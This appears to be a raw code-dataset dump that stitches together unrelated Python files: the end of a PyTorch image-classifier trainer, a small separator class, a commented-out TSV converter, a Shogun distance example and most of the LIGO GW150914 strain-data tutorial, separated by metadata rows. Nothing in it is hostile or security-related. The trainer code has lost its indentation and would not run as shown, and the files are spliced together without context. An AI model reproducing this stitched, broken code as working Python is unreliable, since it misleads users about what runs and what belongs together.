                self.log += "batch : %.3d | Loss: %.3f | Acc : %.3f%% | f1_score : %.3f%% | inference_time : %.3f / load_time : %.3f \n" \
                            % (batch_idx, train_loss / (batch_idx + 1), 100. * correct / total, f1_score / (batch_idx + 1),
                               inference_time / (batch_idx + 1), load_time / (batch_idx + 1))
                print("batch : %.3d | Loss: %.3f | Acc : %.3f%% | f1_score : %.3f%% | inference_time : %.3f / load_time : %.3f \r"
                      % (batch_idx, train_loss / (batch_idx + 1), 100. * correct / total, f1_score / (batch_idx + 1),
                         inference_time / (batch_idx + 1), load_time / (batch_idx + 1)), end="")
def test_one_epoch(self, epoch):
self.model.eval()
test_loss = 0
correct = 0
total = 0
f1_score = 0
print()
print(f"====Evaluation model epoch : {epoch}====")
with torch.no_grad():
for batch_idx, (inputs, labels) in enumerate(self.val_loader):
inputs, labels = inputs.to(self.device), labels.to(self.device)
outputs = self.model(inputs)
loss = self.criterion(outputs, labels)
test_loss += loss.item()
_, predicted = outputs.max(1)
total += labels.size(0)
correct += predicted.eq(labels).sum().item()
f1_score += self.f1_score(predicted, labels)
print(f"progress:{batch_idx * self.batch_size} | {len(self.val_paths)} \r", end="")
        self.log += f'Accuracy of the network on the {total} test image : %d %% | f1_score : %.3f %%' % (
            100 * correct / total, f1_score / (batch_idx + 1))
        print(f'Accuracy of the network on the {total} test image : %d %% | f1_score : %.3f %%' % (
            100 * correct / total, f1_score / (batch_idx + 1)))
def save_model(self, epoch, save_path, name='student'):
print(f'saved model {save_path}')
if not os.path.exists(save_path):
os.makedirs(save_path)
file_name = f"{name}_{epoch}.pth"
file_path = os.path.join(save_path, file_name)
torch.save(self.model.state_dict(), file_path)
with open(f'{save_path}/log.txt', 'w') as f:
f.write(self.log)
return None
def train_test_split(self):
meta_data = pd.read_csv('../input/data/train/train.csv')
        if self.train_ratio < 1:
            # stratify the person-level split on (gender x age) class so the
            # train and validation sets share the same label distribution
            meta_data['cls'] = meta_data.path.map(self.get_person_class)
            train_paths, val_paths = train_test_split(meta_data, train_size=self.train_ratio, stratify=meta_data['cls'])
self.train_paths, self.val_paths = train_paths.path.values, val_paths.path.values
self.train_loader = DataLoader(self.dataset(dir_paths=self.train_paths), batch_size=self.batch_size,
shuffle=True, num_workers=4)
self.val_loader = DataLoader(self.val_dataset(dir_paths=self.val_paths), batch_size=self.batch_size,
shuffle=True, num_workers=4)
else:
self.train_paths, self.val_paths = list(meta_data.path.values), []
self.train_loader = DataLoader(self.dataset(dir_paths=self.train_paths), batch_size=self.batch_size,
shuffle=True, num_workers=4)
def f1_score(self, y_pred, target):
y_pred, target = np.asarray(y_pred.to('cpu')), np.asarray(target.to('cpu'))
return f1_score(y_pred, target, average='macro')
def get_person_class(self, data):
gender = utils.get_gender_logit(data)
age_cls = utils.get_age_class(data.split('_')[-1])
return gender*3 + age_cls
|
[
"[email protected]"
] | |
8d49dfba348dc525114f8c35b0b4eaa0c06bf9fd
|
0427eeafe5dfa0d25a88c535e16f2c5c566f7ebf
|
/Expression/separator.py
|
c656696079f48ab02d77130c74e3c754784d4bde
|
[] |
no_license
|
balujaashish/NOW_PDF_Reader
|
86d653536317d064ebbe40e9a3b5c9233fd95b9a
|
f6cba94f034352e2c7287e98bdbb89a9baa7cfe6
|
refs/heads/master
| 2021-03-31T15:17:37.169832 | 2020-06-16T05:53:12 | 2020-06-16T05:53:12 | 248,115,613 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 83 |
py
|
class Separator():
def __init__(self):
self.separators = ['=', ':']
|
[
"[email protected]"
] | |
f1babe1d7b57929d0c33a6a71de633682880da6e
|
2d2b25484e96753891554df3d1f3ea86e5df2bd2
|
/hits/__init__.py
|
5479b058039073cbf7d4528c1fda0c74a8fad336
|
[] |
no_license
|
maxzuo/HITSystem
|
83d8539c9dd5916a7952c9d5f647ace8b12382b2
|
943ba5c1d17df79b1f6f346cfdefcaab8d5bc2ec
|
refs/heads/master
| 2020-04-23T22:59:41.921050 | 2019-04-19T21:38:09 | 2019-04-19T21:38:09 | 171,520,452 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,538 |
py
|
import sys
import os
from datetime import datetime
import convert
__version__ = "0.1.0"
# class __Converter:
# def __init__(self):
# # self.
# return
# #Converts HIT src to tsv using key and saving it to dest
# def raw2tsv(self, src, key, dest, verbose=False):
# now = datetime.now()
# if (not os.path.isfile(src)):
# raise Exception("The provided source filepath is not a file: %s" % src)
# if (not os.path.isfile(key)):
# raise Exception("The provided key filepath is not a file: %s" % src)
# #Retrieve and process raw data. Hardcoding to ignore the first 5 lines
# #and the 7th line (not important)
# raw = process(readLines(src))
# #Printing metadata deleted when processing the file
# os.system("clear")
# print "Raw File:\t\t\t\t%s\n\nMetadata:\n" %src, reduce(lambda x,y: "\n".join([x,y]),
# map(lambda x: "\r\t\t\t\t\t".join(x), raw[:5]))
# matrix = raw[5:]
# matrix.pop(1)
# #calculating columns and rows so the resulting matrix will be rectangular
# cols = max([len(line) for line in matrix])
# rows = len(matrix)
# #recreating tsv as a matrix. Not completely necessary
# for line in matrix:
# while len(line) < cols:
# line.append("")
# #Retrieve keys and store in a dictionary
# # print matrix[0]
# keys = self.__process(readLines(key))
# keyDict = {}
# for key in keys:
# keyDict[key[1]] = key[0]
# #Array tagged used to remember indices of desired elements
# tagged = []
# for i in xrange(cols):
# try:
# matrix[0][i] = keyDict[matrix[0][i]]
# tagged.append(i)
# except:
# pass
# #Write new file at destinated file path
# with open(dest, "w") as destFile:
# for i in xrange(rows):
# line = []
# for j in xrange(cols):
# if j == 0 or j in tagged:
# line.append(matrix[i][j])
# destFile.write("\t".join(line) + "\n")
# print "\n\nProcessed file saved at:\t\t%s\n" % dest
# if verbose:
# print "Conversion took\t\t\t\t%s\n" % str(datetime.now() - now)
# #Wrapper function to open, read, and then close a file
# #Returns an array of lines
# def __readLines(self, src):
# src = open(src, "r")
# lines = src.readlines()
# src.close()
# return lines
# #Wrapper function to process and clean tsv files
# #Returns tsv back
# def __process(self, tsv):
# tsv = [line.replace("\r\n", "").replace("\n", "") for line in tsv]
# tsv = map(lambda line: line.split("\t"), tsv)
# for line in tsv:
# try:
# line.remove("")
# except:
# pass
# return tsv
|
[
"[email protected]"
] | |
f9520500f015b1f2f85946de085b6dfb1d169031
|
b92b0e9ba2338ab311312dcbbeefcbb7c912fc2e
|
/build/shogun_lib/examples/documented/python_modular/distance_sparseeuclidean_modular.py
|
2e8e098e832784cb39eb330eae2d7c48c0f9148f
|
[] |
no_license
|
behollis/muViewBranch
|
384f8f97f67723b2a4019294854969d6fc1f53e8
|
1d80914f57e47b3ad565c4696861f7b3213675e0
|
refs/heads/master
| 2021-01-10T13:22:28.580069 | 2015-10-27T21:43:20 | 2015-10-27T21:43:20 | 45,059,082 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,057 |
py
|
# In this example a sparse euclidean distance is computed for sparse toy data.
from tools.load import LoadMatrix
lm=LoadMatrix()
traindat = lm.load_numbers('../data/fm_train_real.dat')
testdat = lm.load_numbers('../data/fm_test_real.dat')
parameter_list = [[traindat,testdat],[traindat,testdat]]
def distance_sparseeuclidean_modular (fm_train_real=traindat,fm_test_real=testdat):
from shogun.Features import RealFeatures, SparseRealFeatures
from shogun.Distance import SparseEuclidianDistance
realfeat=RealFeatures(fm_train_real)
feats_train=SparseRealFeatures()
feats_train.obtain_from_simple(realfeat)
realfeat=RealFeatures(fm_test_real)
feats_test=SparseRealFeatures()
feats_test.obtain_from_simple(realfeat)
distance=SparseEuclidianDistance(feats_train, feats_train)
dm_train=distance.get_distance_matrix()
distance.init(feats_train, feats_test)
dm_test=distance.get_distance_matrix()
return distance,dm_train,dm_test
if __name__=='__main__':
print('SparseEuclidianDistance')
distance_sparseeuclidean_modular(*parameter_list[0])
|
[
"prosen@305cdda6-5ce1-45b3-a98d-dfc68c8b3305"
] |
prosen@305cdda6-5ce1-45b3-a98d-dfc68c8b3305
|
338f2eb6af266e51dbd32008647d14094b811fc4
|
c0d312304522defd70997617f8b9288d974001b5
|
/projects/ligo/GW150914_tutorial.py
|
79e1120d82dccdefda0a059369e7098009c43b23
|
[] |
no_license
|
adamw523/ai-north-docker-jupyter
|
312c7e9d2380149a8f2b78aaa63675fe7a4f7fb7
|
9b9ea0b76b83854ba73310c04d578d9bf2ae5dea
|
refs/heads/master
| 2020-04-06T06:53:39.657886 | 2016-09-15T17:58:03 | 2016-09-15T17:58:03 | 64,694,508 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 36,218 |
py
|
# coding: utf-8
# # SIGNAL PROCESSING WITH GW150914 OPEN DATA
#
# Welcome! This ipython notebook (or associated python script GW150914_tutorial.py ) will go through some typical signal processing tasks on strain time-series data associated with the LIGO GW150914 data release from the LIGO Open Science Center (LOSC):
#
# * https://losc.ligo.org/events/GW150914/
#
# * View the tutorial as a web page - https://losc.ligo.org/s/events/GW150914/GW150914_tutorial.html/
# * Download the tutorial as a python script - https://losc.ligo.org/s/events/GW150914/GW150914_tutorial.py/
# * Download the tutorial as iPython Notebook - https://losc.ligo.org/s/events/GW150914/GW150914_tutorial.ipynb/
#
# To begin, download the ipython notebook, readligo.py, and the data files listed below, into a directory / folder, then run it. Or you can run the python script GW150914_tutorial.py. You will need the python packages: numpy, scipy, matplotlib, h5py.
#
# On Windows, or if you prefer, you can use a python development environment such as Anaconda (https://www.continuum.io/why-anaconda) or Enthought Canopy (https://www.enthought.com/products/canopy/).
#
# Questions, comments, suggestions, corrections, etc: email [email protected]
#
# v20160208b
# ## Intro to signal processing
#
# This tutorial assumes that you know python well enough.
#
# If you know how to use "ipython notebook", use the GW150914_tutorial.ipynb file. Else, you can use the GW150914_tutorial.py script.
#
# This tutorial assumes that you know a bit about signal processing of digital time series data (or want to learn!). This includes power spectral densities, spectrograms, digital filtering, whitening, audio manipulation. This is a vast and complex set of topics, but we will cover many of the basics in this tutorial.
#
# If you are a beginner, here are some resources from the web:
# * http://101science.com/dsp.htm
# * https://georgemdallas.wordpress.com/2014/05/14/wavelets-4-dummies-signal-processing-fourier-transforms-and-heisenberg/
# * https://en.wikipedia.org/wiki/Signal_processing
# * https://en.wikipedia.org/wiki/Spectral_density
# * https://en.wikipedia.org/wiki/Spectrogram
# * http://greenteapress.com/thinkdsp/
# * https://en.wikipedia.org/wiki/Digital_filter
#
# And, well, lots more - google it!
# ## Download the data
#
# * Download the data files from LOSC:
# * We will use the hdf5 files, both H1 and L1, with durations of 32 and 4096 seconds around GW150914, sampled at 16384 and 4096 Hz :
# * https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_4_V1-1126259446-32.hdf5
# * https://losc.ligo.org/s/events/GW150914/L-L1_LOSC_4_V1-1126259446-32.hdf5
# * https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_16_V1-1126259446-32.hdf5
# * https://losc.ligo.org/s/events/GW150914/L-L1_LOSC_16_V1-1126259446-32.hdf5
# * https://losc.ligo.org/s/events/GW150914/GW150914_4_NR_waveform.txt
# * Download the python functions to read the data: https://losc.ligo.org/s/sample_code/readligo.py
# * From a unix/mac-osx command line, you can use wget; for example,
# * wget https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_4_V1-1126257414-4096.hdf5
# * Put these files in your current directory / folder. Don't mix any other LOSC data files in this directory, or readligo.py may get confused.
#
# Here,
# * "H-H1" means that the data come from the LIGO Hanford Observatory site and the LIGO "H1" datector;
# * the "_4_" means the strain time-series data are (down-)sampled from 16384 Hz to 4096 Hz;
# * the "V1" means version 1 of this data release;
# * "1126257414-4096" means the data starts at GPS time 1126257414 (Mon Sep 14 09:16:37 GMT 2015), duration 4096 seconds;
# * NOTE: GPS time is number of seconds since Jan 6, 1980 GMT. See http://www.oc.nps.edu/oc2902w/gps/timsys.html or https://losc.ligo.org/gps/
# * the filetype "hdf5" means the data are in hdf5 format:
# https://www.hdfgroup.org/HDF5/
#
# Note that the the 4096 second long files at 16384 Hz sampling rate are fairly big files (125 MB).
# You won't need them for this tutorial:
# * https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_4_V1-1126257414-4096.hdf5
# * https://losc.ligo.org/s/events/GW150914/L-L1_LOSC_4_V1-1126257414-4096.hdf5
# * https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_16_V1-1126257414-4096.hdf5
# * https://losc.ligo.org/s/events/GW150914/L-L1_LOSC_16_V1-1126257414-4096.hdf5
#
# In[2]:
# Standard python numerical analysis imports:
import numpy as np
from scipy import signal
from scipy.interpolate import interp1d
from scipy.signal import butter, filtfilt, iirdesign, zpk2tf, freqz
# the ipython magic below must be commented out in the .py file, since it doesn't work.
#get_ipython().magic(u'matplotlib inline')
#get_ipython().magic(u"config InlineBackend.figure_format = 'retina'")
import matplotlib.pyplot as plt
import matplotlib.mlab as mlab
import h5py
# LIGO-specific readligo.py
import readligo as rl
# **NOTE** that in general, LIGO strain time series data has gaps (filled with NaNs) when the detectors are not taking valid ("science quality") data. Analyzing these data requires the user to loop over "segments" of valid data stretches. In https://losc.ligo.org/segments/ we provide example code to do this.
#
# **However**, the 4096 seconds of released data around GW150914 is one unbroken segment, with no gaps. So for now, we will read it all in and treat it as one valid data segment, ignoring the extra complexity mentioned above.
#
# **This won't work** for other LOSC data releases! See https://losc.ligo.org/segments/ for a more general way to find valid data segments in LOSC data.
# In[3]:
#----------------------------------------------------------------
# Load LIGO data from a single file
#----------------------------------------------------------------
# First from H1
fn_H1 = 'H-H1_LOSC_4_V1-1126259446-32.hdf5'
strain_H1, time_H1, chan_dict_H1 = rl.loaddata(fn_H1, 'H1')
# and then from L1
fn_L1 = 'L-L1_LOSC_4_V1-1126259446-32.hdf5'
strain_L1, time_L1, chan_dict_L1 = rl.loaddata(fn_L1, 'L1')
# sampling rate:
fs = 4096
# both H1 and L1 will have the same time vector, so:
time = time_H1
# the time sample interval (uniformly sampled!)
dt = time[1] - time[0]
# ## Adding a numerical relativity template
#
# Now let's also read in a theoretical (numerical relativity) template,
# generated with parameters favored by the output from the GW150914 parameter estimation (see the GW150914 detection paper, https://dcc.ligo.org/P150914/public ).
#
# This NR template corresponds to the signal expected from a pair of black holes with masses of around 36 and 29 solar masses, merging into a single black hole of 62 solar masses, at a distance of around 410 Mpc.
#
# You can fetch the template time series from the following URL, and put it in your working directory / folder:
# * https://losc.ligo.org/s/events/GW150914/GW150914_4_NR_waveform.txt
#
# In[4]:
# read in the NR template
NRtime, NR_H1 = np.genfromtxt('GW150914_4_NR_waveform.txt').transpose()
# ## First look at the data from H1 and L1
# In[5]:
# First, let's look at the data and print out some stuff:
# this doesn't seem to work for scientific notation:
# np.set_printoptions(precision=4)
print ' time_H1: len, min, mean, max = ', len(time_H1), time_H1.min(), time_H1.mean(), time_H1.max()
print 'strain_H1: len, min, mean, max = ', len(strain_H1), strain_H1.min(),strain_H1.mean(),strain_H1.max()
print 'strain_L1: len, min, mean, max = ', len(strain_L1), strain_L1.min(),strain_L1.mean(),strain_L1.max()
#What's in chan_dict? See https://losc.ligo.org/archive/dataset/GW150914/
bits = chan_dict_H1['DATA']
print 'H1 DATA: len, min, mean, max = ', len(bits), bits.min(),bits.mean(),bits.max()
bits = chan_dict_H1['CBC_CAT1']
print 'H1 CBC_CAT1: len, min, mean, max = ', len(bits), bits.min(),bits.mean(),bits.max()
bits = chan_dict_H1['CBC_CAT2']
print 'H1 CBC_CAT2: len, min, mean, max = ', len(bits), bits.min(),bits.mean(),bits.max()
bits = chan_dict_L1['DATA']
print 'L1 DATA: len, min, mean, max = ', len(bits), bits.min(),bits.mean(),bits.max()
bits = chan_dict_L1['CBC_CAT1']
print 'L1 CBC_CAT1: len, min, mean, max = ', len(bits), bits.min(),bits.mean(),bits.max()
bits = chan_dict_L1['CBC_CAT2']
print 'L1 CBC_CAT2: len, min, mean, max = ', len(bits), bits.min(),bits.mean(),bits.max()
print 'In both H1 and L1, all 32 seconds of data are present (DATA=1), '
print "and all pass data quality (CBC_CAT1=1 and CBC_CAT2=1)."
# In[6]:
# plot +- 5 seconds around the event:
tevent = 1126259462.422 # Mon Sep 14 09:50:45 GMT 2015
deltat = 5. # seconds around the event
# index into the strain time series for this time interval:
indxt = np.where((time_H1 >= tevent-deltat) & (time_H1 < tevent+deltat))
plt.figure()
plt.plot(time_H1[indxt]-tevent,strain_H1[indxt],'r',label='H1 strain')
plt.plot(time_L1[indxt]-tevent,strain_L1[indxt],'g',label='L1 strain')
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('strain')
plt.legend(loc='lower right')
plt.title('Advanced LIGO strain data near GW150914')
plt.savefig('GW150914_strain.png')
# The data are dominated by **low frequency noise**; there is no way to see a signal here, without some signal processing.
#
# There are very low frequency oscillations that are putting the mean of the L1 strain at -2.0e-18 at the time around this event, so it appears offset from the H1 strain. These low frequency oscillations are essentially ignored in LIGO data analysis (see bandpassing, below).
#
# We will be "whitening" the data, below.
# ## Data in the Fourier domain - ASDs
#
# Plotting these data in the Fourier domain gives us an idea of the frequency content of the data. A way to visualize the frequency content of the data is to plot the amplitude spectral density, ASD.
#
# The ASDs are the square root of the power spectral densities (PSDs), which are averages of the square of the fast fourier transforms (FFTs) of the data.
#
# They are an estimate of the "strain-equivalent noise" of the detectors versus frequency,
# which limit the ability of the detectors to identify GW signals.
#
# They are in units of strain/rt(Hz).
# So, if you want to know the root-mean-square (rms) strain noise in a frequency band,
# integrate (sum) the squares of the ASD over that band, then take the square-root.
#
# There's a signal in these data!
# For the moment, let's ignore that, and assume it's all noise.
# In[7]:
# number of sample for the fast fourier transform:
NFFT = 1*fs
fmin = 10
fmax = 2000
Pxx_H1, freqs = mlab.psd(strain_H1, Fs = fs, NFFT = NFFT)
Pxx_L1, freqs = mlab.psd(strain_L1, Fs = fs, NFFT = NFFT)
# We will use interpolations of the ASDs computed above for whitening:
psd_H1 = interp1d(freqs, Pxx_H1)
psd_L1 = interp1d(freqs, Pxx_L1)
# plot the ASDs:
plt.figure()
plt.loglog(freqs, np.sqrt(Pxx_H1),'r',label='H1 strain')
plt.loglog(freqs, np.sqrt(Pxx_L1),'g',label='L1 strain')
plt.axis([fmin, fmax, 1e-24, 1e-19])
plt.grid('on')
plt.ylabel('ASD (strain/rtHz)')
plt.xlabel('Freq (Hz)')
plt.legend(loc='upper center')
plt.title('Advanced LIGO strain data near GW150914')
plt.savefig('GW150914_ASDs.png')
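# As a concrete example of the rms recipe described above (an illustrative
# addition, not part of the original tutorial; the band edges are arbitrary):
# sum the PSD over a frequency band and take the square root.
f1, f2 = 100., 150.
band = (freqs >= f1) & (freqs < f2)
df = freqs[1] - freqs[0]
print 'rms strain noise in H1 between %g and %g Hz = %g' % (f1, f2, np.sqrt(Pxx_H1[band].sum() * df))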
# NOTE that we only plot the data between fmin = 10 Hz and fmax = 2000 Hz.
#
# Below fmin, the data **are not properly calibrated**. That's OK, because the noise is so high below fmin that LIGO cannot sense gravitational wave strain from astrophysical sources in that band.
#
# The sample rate is fs = 4096 Hz (2^12 Hz), so the data cannot capture frequency content above the Nyquist frequency = fs/2 = 2048 Hz. That's OK, because GW150914 only has detectable frequency content in the range 20 Hz - 300 Hz.
#
# You can see strong spectral lines in the data; they are all of instrumental origin. Some are engineered into the detectors (mirror suspension resonances at ~500 Hz and harmonics, calibration lines, control dither lines, etc) and some (60 Hz and harmonics) are unwanted. We'll return to these, later.
#
# You can't see the signal in this plot, since it is relatively weak and less than a second long, while this plot averages over 32 seconds of data. So this plot is entirely dominated by instrumental noise.
#
# Later on in this tutorial, we'll look at the data sampled at the full 16384 Hz (2^14 Hz).
# ## Whitening
#
# From the ASD above, we can see that the data are very strongly "colored" - noise fluctuations are much larger at low and high frequencies and near spectral lines, reaching a roughly flat ("white") minimum in the band around 80 to 300 Hz.
#
# We can "whiten" the data (dividing it by the noise amplitude spectrum, in the fourier domain), suppressing the extra noise at low frequencies and at the spectral lines, to better see the weak signals in the most sensitive band.
#
# Whitening is always one of the first steps in astrophysical data analysis (searches, parameter estimation).
# Whitening requires no prior knowledge of spectral lines, etc; only the data are needed.
#
# The resulting time series is no longer in units of strain; now in units of "sigmas" away from the mean.
# In[8]:
# function to whiten data
def whiten(strain, interp_psd, dt):
Nt = len(strain)
freqs = np.fft.rfftfreq(Nt, dt)
# whitening: transform to freq domain, divide by asd, then transform back,
# taking care to get normalization right.
hf = np.fft.rfft(strain)
white_hf = hf / (np.sqrt(interp_psd(freqs) /dt/2.))
white_ht = np.fft.irfft(white_hf, n=Nt)
return white_ht
# now whiten the data from H1 and L1, and also the NR template:
strain_H1_whiten = whiten(strain_H1,psd_H1,dt)
strain_L1_whiten = whiten(strain_L1,psd_L1,dt)
NR_H1_whiten = whiten(NR_H1,psd_H1,dt)
# Now plot the whitened strain data, along with the best-fit numerical relativity (NR) template.
#
# To get rid of remaining high frequency noise, we will also bandpass the data (see bandpassing, below).
# In[9]:
# We need to suppress the high frequencies with some bandpassing:
bb, ab = butter(4, [20.*2./fs, 300.*2./fs], btype='band')
strain_H1_whitenbp = filtfilt(bb, ab, strain_H1_whiten)
strain_L1_whitenbp = filtfilt(bb, ab, strain_L1_whiten)
NR_H1_whitenbp = filtfilt(bb, ab, NR_H1_whiten)
# plot the data after whitening:
# first, shift L1 by 7 ms, and invert. See the GW150914 detection paper for why!
strain_L1_shift = -np.roll(strain_L1_whitenbp,int(0.007*fs))
plt.figure()
plt.plot(time-tevent,strain_H1_whitenbp,'r',label='H1 strain')
plt.plot(time-tevent,strain_L1_shift,'g',label='L1 strain')
plt.plot(NRtime+0.002,NR_H1_whitenbp,'k',label='matched NR waveform')
plt.xlim([-0.1,0.05])
plt.ylim([-4,4])
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('whitened strain')
plt.legend(loc='lower left')
plt.title('Advanced LIGO WHITENED strain data near GW150914')
plt.savefig('GW150914_strain_whitened.png')
# The signal is now clearly visible in the whitened and bandpassed data. The "DC" offset between H1 and L1 data visible in the first plot is no longer visible here; the bandpassing cuts off frequency components below around 20 Hz and above 300 Hz.
#
# The signal is visible as an oscillation sweeping from low to high frequency from -0.10 seconds to 0, then damping down into the random noise.
#
# The signal looks roughly the same in both detectors. We had to shift the L1 data by 7 ms to get it to line up with the data from H1, because the source is roughly in the direction of the line connecting H1 to L1, and the wave travels at the speed of light, so it hits L1 7 ms earlier. Also, the orientation of L1 with respect to H1 means that we have to flip the sign of the signal in L1 for it to match the signal in H1.
#
# It's exactly the kind of signal we expect from the inspiral, merger and ringdown of two massive black holes, as evidenced by the good match with the numerical relativity (NR) waveform, in black.
#
# LIGO uses a rather elaborate software suite to match the data against a family of such signal waveforms ("templates"), to find the best match. This procedure helps LIGO to "optimally" separate signals from instrumental noise, and to infer the parameters of the source (masses, spins, sky location, orbit orientation, etc) from the best match templates.
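# A toy illustration of template matching (an illustrative addition, far
# simpler than the matched filtering LIGO actually uses): slide the whitened
# NR template across the whitened H1 data via a normalized cross-correlation;
# the peak should land close to the event time (edge artifacts from the
# FFT-based whitening aside).
template = NR_H1_whitenbp / np.linalg.norm(NR_H1_whitenbp)
xcorr = np.correlate(strain_H1_whitenbp, template, mode='same')
imax = np.argmax(np.abs(xcorr))
print 'toy template match peaks %.4f s relative to tevent' % (time[imax] - tevent)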
# ## Spectrograms
#
# Now let's plot a short time-frequency spectrogram around GW150914:
# In[10]:
tevent = 1126259462.422 # Mon Sep 14 09:50:45 GMT 2015
deltat = 10. # seconds around the event
# index into the strain time series for this time interval:
indxt = np.where((time_H1 >= tevent-deltat) & (time_H1 < tevent+deltat))
# pick a shorter FFT time interval, like 1/8 of a second:
NFFT = fs/8
# and with a lot of overlap, to resolve short-time features:
NOVL = NFFT*15/16
# and choose a window that minimizes "spectral leakage"
# (https://en.wikipedia.org/wiki/Spectral_leakage)
window = np.blackman(NFFT)
# the right colormap is all-important! See:
# http://matplotlib.org/examples/color/colormaps_reference.html
# viridis seems to be the best for our purposes, but it's new; if you don't have it, you can settle for ocean.
spec_cmap='viridis'
#spec_cmap='ocean'
# Plot the H1 spectrogram:
plt.figure()
spec_H1, freqs, bins, im = plt.specgram(strain_H1[indxt], NFFT=NFFT, Fs=fs, window=window,
noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat])
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('Frequency (Hz)')
plt.colorbar()
plt.axis([-deltat, deltat, 0, 2000])
plt.title('aLIGO H1 strain data near GW150914')
plt.savefig('GW150914_H1_spectrogram.png')
# Plot the L1 spectrogram:
plt.figure()
spec_L1, freqs, bins, im = plt.specgram(strain_L1[indxt], NFFT=NFFT, Fs=fs, window=window,
noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat])
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('Frequency (Hz)')
plt.colorbar()
plt.axis([-deltat, deltat, 0, 2000])
plt.title('aLIGO L1 strain data near GW150914')
plt.savefig('GW150914_L1_spectrogram.png')
# In the above spectrograms, you can see lots of excess power below ~20 Hz, as well as strong spectral lines at 500, 1000, 1500 Hz (also evident in the ASDs above). The lines at multiples of 500 Hz are the harmonics of the "violin modes" of the fibers holding up the mirrors of the LIGO interferometers.
#
# The signal is just barely visible here, at time=0 and below 500 Hz. We need to zoom in around the event time, and to the frequency range from [20, 400] Hz, and use the whitened data generated above.
# In[11]:
# plot the whitened data, zooming in on the signal region:
tevent = 1126259462.422 # Mon Sep 14 09:50:45 GMT 2015
deltat = 10. # seconds around the event
# index into the strain time series for this time interval:
indxt = np.where((time_H1 >= tevent-deltat) & (time_H1 < tevent+deltat))
# pick a shorter FFT time interval, like 1/16 of a second:
NFFT = fs/16
# and with a lot of overlap, to resolve short-time features:
NOVL = NFFT*15/16
# and choose a window that minimizes "spectral leakage"
# (https://en.wikipedia.org/wiki/Spectral_leakage)
window = np.blackman(NFFT)
# Plot the H1 whitened spectrogram around the signal
plt.figure()
spec_H1, freqs, bins, im = plt.specgram(strain_H1_whiten[indxt], NFFT=NFFT, Fs=fs, window=window,
noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat])
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('Frequency (Hz)')
plt.colorbar()
plt.axis([-0.5, 0.5, 0, 500])
plt.title('aLIGO H1 strain data near GW150914')
plt.savefig('GW150914_H1_spectrogram_whitened.png')
# Plot the L1 whitened spectrogram around the signal
plt.figure()
spec_L1, freqs, bins, im = plt.specgram(strain_L1_whiten[indxt], NFFT=NFFT, Fs=fs, window=window,
noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat])
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('Frequency (Hz)')
plt.colorbar()
plt.axis([-0.5, 0.5, 0, 500])
plt.title('aLIGO L1 strain data near GW150914')
plt.savefig('GW150914_L1_spectrogram_whitened.png')
# See the smudge between -0.2 and 0 seconds? That's our signal!
# You can see it 'chirping' from lower to higher frequency over a small fraction of a second.
# ## Time-domain filtering - Bandpassing+notching
#
# Now let's filter the signal in the time domain, using bandpassing to reveal the signal in the frequency band [40 , 300 Hz], and notching of spectral lines to remove those noise sources from the data.
# In[12]:
# generate linear time-domain filter coefficients, common to both H1 and L1.
# First, define some functions:
# This function will generate digital filter coefficients for bandstops (notches).
# Understanding it requires some signal processing expertise, which we won't get into here.
def iir_bandstops(fstops, fs, order=4):
"""ellip notch filter
fstops is a list of entries of the form [frequency (Hz), df, df2]
where df is the pass width and df2 is the stop width (narrower
than the pass width). Use caution if passing more than one freq at a time,
because the filter response might behave in ways you don't expect.
"""
nyq = 0.5 * fs
# Zeros zd, poles pd, and gain kd for the digital filter
zd = np.array([])
pd = np.array([])
kd = 1
# Notches
for fstopData in fstops:
fstop = fstopData[0]
df = fstopData[1]
df2 = fstopData[2]
low = (fstop - df) / nyq
high = (fstop + df) / nyq
low2 = (fstop - df2) / nyq
high2 = (fstop + df2) / nyq
z, p, k = iirdesign([low,high], [low2,high2], gpass=1, gstop=6,
ftype='ellip', output='zpk')
zd = np.append(zd,z)
pd = np.append(pd,p)
# Set gain to one at 100 Hz...better not notch there
bPrelim,aPrelim = zpk2tf(zd, pd, 1)
outFreq, outg0 = freqz(bPrelim, aPrelim, 100/nyq)
# Return the numerator and denominator of the digital filter
b,a = zpk2tf(zd,pd,k)
return b, a
def get_filter_coefs(fs):
# assemble the filter b,a coefficients:
coefs = []
# bandpass filter parameters
lowcut=43
highcut=260
order = 4
# bandpass filter coefficients
nyq = 0.5*fs
low = lowcut / nyq
high = highcut / nyq
bb, ab = butter(order, [low, high], btype='band')
coefs.append((bb,ab))
# Frequencies of notches at known instrumental spectral line frequencies.
# You can see these lines in the ASD above, so it is straightforward to make this list.
notchesAbsolute = np.array(
[14.0,34.70, 35.30, 35.90, 36.70, 37.30, 40.95, 60.00,
120.00, 179.99, 304.99, 331.49, 510.02, 1009.99])
# notch filter coefficients:
for notchf in notchesAbsolute:
bn, an = iir_bandstops(np.array([[notchf,1,0.1]]), fs, order=4)
coefs.append((bn,an))
# Manually do a wider notch filter around 510 Hz etc.
bn, an = iir_bandstops(np.array([[510,200,20]]), fs, order=4)
coefs.append((bn, an))
# also notch out the forest of lines around 331.5 Hz
bn, an = iir_bandstops(np.array([[331.5,10,1]]), fs, order=4)
coefs.append((bn, an))
return coefs
# and then define the filter function:
def filter_data(data_in,coefs):
data = data_in.copy()
for coef in coefs:
b,a = coef
# filtfilt applies a linear filter twice, once forward and once backwards.
# The combined filter has linear phase.
data = filtfilt(b, a, data)
return data
# To visualize the effect of this filter, let's generate "white" gaussian noise, and filter it.
# In[13]:
# get filter coefficients
coefs = get_filter_coefs(fs)
# generate random gaussian "data"
data = np.random.randn(128*fs)
# filter it:
resp = filter_data(data,coefs)
